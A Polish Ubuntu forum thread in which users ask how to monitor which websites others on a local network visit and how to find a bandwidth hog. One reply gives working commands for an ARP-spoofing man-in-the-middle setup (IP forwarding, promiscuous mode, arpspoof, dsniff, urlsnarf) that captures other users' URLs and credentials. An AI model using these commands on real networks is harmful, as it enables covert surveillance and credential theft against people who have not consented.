Wireshark - sprawdzanie stron używanych przez osoby w sieci w czasie rzczywistym
- none
- Sędziwy Jeż
- Wersja Ubuntu: inny OS
- Środowisko graficzne: LXDE
Wireshark - sprawdzanie stron używanych przez osoby w sieci w czasie rzczywistym
Witam mam małą sieć wi-fi ok 10 komputerów i chciałbym się dowiedzieć jak mógłbym w czasie rzeczywistym zobaczyć na jakie strony wchodzą użytkownicy ponieważ przy kazdym wejsciu mam ok ok 50 pakietów i analizować każdy byłby problem czy można jakoś to zmienić by ograniczyć tylko do nazwy strony i dokładnego linka. Moze być to realizowane w innym programie byle by miało tą samą funkcjonalność.Nie żebym chciał kogoś kontrolować tylko chce to zrobić testowo.
Pozdrawiam
PS. Proszę o szybką odpowiedz bo jest mi to potrzebne na dzisiaj
Pozdrawiam
PS. Proszę o szybką odpowiedz bo jest mi to potrzebne na dzisiaj
%55%62%75%6E%74%75%20%26%20%44%65%62%69%61%6E%20%75%73%65%72%2C%20%6D%79%20%67%67%3A%31%30%30%33%30%39%38%38
-
- Piegowaty Guziec
- Wersja Ubuntu: 8.10
- Środowisko graficzne: GNOME
Odp: Wireshark - sprawdzanie stron używanych przez osoby w sieci w czasie rzczywistym
Mam podobny problem mianowicie potrzebuje zeskanować sieć około 20 komputerów aby ustalić ktory z nich generuję za duży ruch i zapycha łączę przez co inne komputery nie mogą pracować. Mam Wiresharka ale kiedy wepne się do switcha to widze tylko ruch na swoim kompie a pozostałych nie. Jaki sprzęt dołączyć do sieci, bądź jak zmienić konfiguracje aby móc ustalić który komputer pracuje nie tak jak powinien.
- pyx-84
- Sędziwy Jeż
- Wersja Ubuntu: 10.04
- Architektura: x86_64
Odp: Wireshark - sprawdzanie stron używanych przez osoby w sieci w czasie rzczywistym
Pakiet dsniff
Włączamy najpierw forwardowanie pakietów:
Wprowadzamy kartę sieciową w tryb nasłuchu pakietów przychodzących jak i wychodzących:
Gdy masz np. radiówkę dobrze jest dać:
Co spowoduje przechodzenie całego ruchu w sieci przez Twój komputer
sniffinig :
Oglądasz jakie www kto przegląda :
oraz
EDITED: man dsniff
Włączamy najpierw forwardowanie pakietów:
Kod: Zaznacz cały
# echo 1 > /proc/sys/net/ipv4/ip_forward
ifconfig eth0 promisc
arpspoof -i etho IP_SERWERA >&/dev/null&
sniffinig :
dsniff -i eth0 -c
urlsnarf
tail -f urlsnarf
Software Should Be Free As In Freedom !
-
- Sędziwy Jeż
- Wersja Ubuntu: 12.04
- Architektura: x86
- Kontakt:
Ja czasem testowo badam sobie obciążenie jnettop'em...ale oczywiście odpalam go na routerku...a jeśli nie...to tak jak napisał poprzednik - włączyć tryb nasłuchu i badać.